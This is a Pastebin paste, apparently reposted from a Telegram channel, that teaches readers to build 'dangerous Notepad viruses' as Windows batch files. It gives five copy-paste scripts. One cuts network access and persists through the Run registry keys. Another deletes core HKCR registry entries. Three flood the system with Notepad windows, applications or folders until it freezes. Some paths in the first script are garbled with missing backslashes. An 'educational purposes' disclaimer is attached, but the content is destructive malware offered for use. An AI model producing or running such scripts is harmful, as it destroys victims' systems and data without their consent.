Advertisement
anaswae

VIRUS WINDOWS

May 11th, 2020
1,053
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.73 KB | None | 0 0
  1. ​​🔰 How To Create Dangerous Notepad Virus 🔰
  2.  
  3. 👾 Have you ever thought of creating a computer virus by yourself? No need to worry, here is a complete tutorial to let you know how to create simple but dangerous Notepad Virus step by step with an explanation! 😎
  4.  
  5. As you all know that Virus is nothing but a malicious program which enters into a system without permission and affects the data and the working of the operating system. Viruses do unwanted tasks like replicating itself corrupting user files etc,  so, basically, we are going to create some unwanted scripts, that which we can execute in order to destroy or break the system.
  6.  
  7. ➖➖➖➖@itscybertech➖➖➖➖
  8.  
  9. 🤖 Create Notepad Virus Using Batch Scripting 👾
  10.  
  11. First of all, what is batch scripting, those who don’t know, take a look below:
  12.  
  13. “It is simply a text file, containing a series of commands, which are executed automatically, line by line when the batch file runs.”
  14.  
  15. By using Batch File you can create an extremely dangerous virus which can delete the Windows files, format different drives [C:\, E:], steal data files and information, disable antivirus, firewall, etc.
  16.  
  17. ⚠NOTE: This post is solely and mainly for educational purpose only. I am nowhere responsible for any kind of damage caused by this tutorial.
  18.  
  19. ➖➖➖➖➖@itscybertech➖➖➖➖➖
  20.  
  21.  
  22. ♠ Write a dangerous virus in Notepad/Text Editor
  23.  
  24. First of all, you need a windows PC, obviously. 😉
  25.  
  26. For this tutorial to create simple Notepad Virus you don’t need to be a die-hard programmer or something like that, but a basic knowledge of flow charts and loops helps you a lot to understand what’s going on here. So let’s start to create a trojan virus using notepad to run via command prompt(cmd) in Windows 10, 8/8.1, 7 or XP.
  27.  
  28. 🔹Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given below one by one for the different virus in a different file.
  29.  
  30. Notepad Virus source codes are Given below: 👇
  31.  
  32. 🌀1. Disable Internet Permanently
  33.  
  34. This code will disable the internet connectivity permanently.
  35.  
  36. echo @echo off>c:windowswimn32.bat
  37. echo break off>c:windowswimn32.bat echo
  38. ipconfig/release_all>c:windowswimn32.bat
  39. echo end>c:windowswimn32.batreg add
  40. hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
  41. hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  42. echo You Have Been HACKED!
  43. PAUSE
  44.  
  45.  
  46. 2🌀. Delete Key Registry Files
  47.  
  48. This will delete key registry files, then loops a message
  49.  
  50. This is dangerous and unrecoverable Notepad Virus.
  51.  
  52. @ECHO OFF
  53. START reg delete HKCR/.exe
  54. START reg delete HKCR/.dll
  55. START reg delete HKCR/*
  56. :MESSAGE
  57. ECHO Your PC has been crashed.Your Dad.
  58. GOTO MESSAGE
  59.  
  60.  
  61. 3🌀. Endless Notepads
  62.  
  63. This will pop up endless notepads until the computer freezes and crashes
  64.  
  65. @ECHO off
  66. :top
  67. START %SystemRoot%\system32\notepad.exe
  68. GOTO top
  69.  
  70.  
  71. 4🌀. Application Bomber
  72.  
  73. It will start to open different applications repeatedly which will affect the system’s performance.
  74.  
  75. You can also add the application of your choice in the above code.
  76.  
  77. @echo off
  78. :x
  79. start winword
  80. start mspaint
  81. start notepad
  82. start write
  83. start cmd
  84. start explorer
  85. start control
  86. start calc
  87. goto x
  88.  
  89.  
  90. 5🌀.Folder Flooder
  91.  
  92. This will create unlimited no. of folders.
  93.  
  94. @echo off
  95. :x
  96. md %random%
  97. /folder.
  98. goto x
  99.  
  100. 🔹After copy-pasting any one of the viruses at a time in the Notepad, save the file in ALL FILES mode with an extension “.bat“(without quotes). 🔹
  101.  
  102. Done
  103.  
  104. ❗❗Don't try this on your daily working pc❗❗❗❗
  105.  
  106.  
  107. ➖➖➖➖@itscybertech➖➖➖➖
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement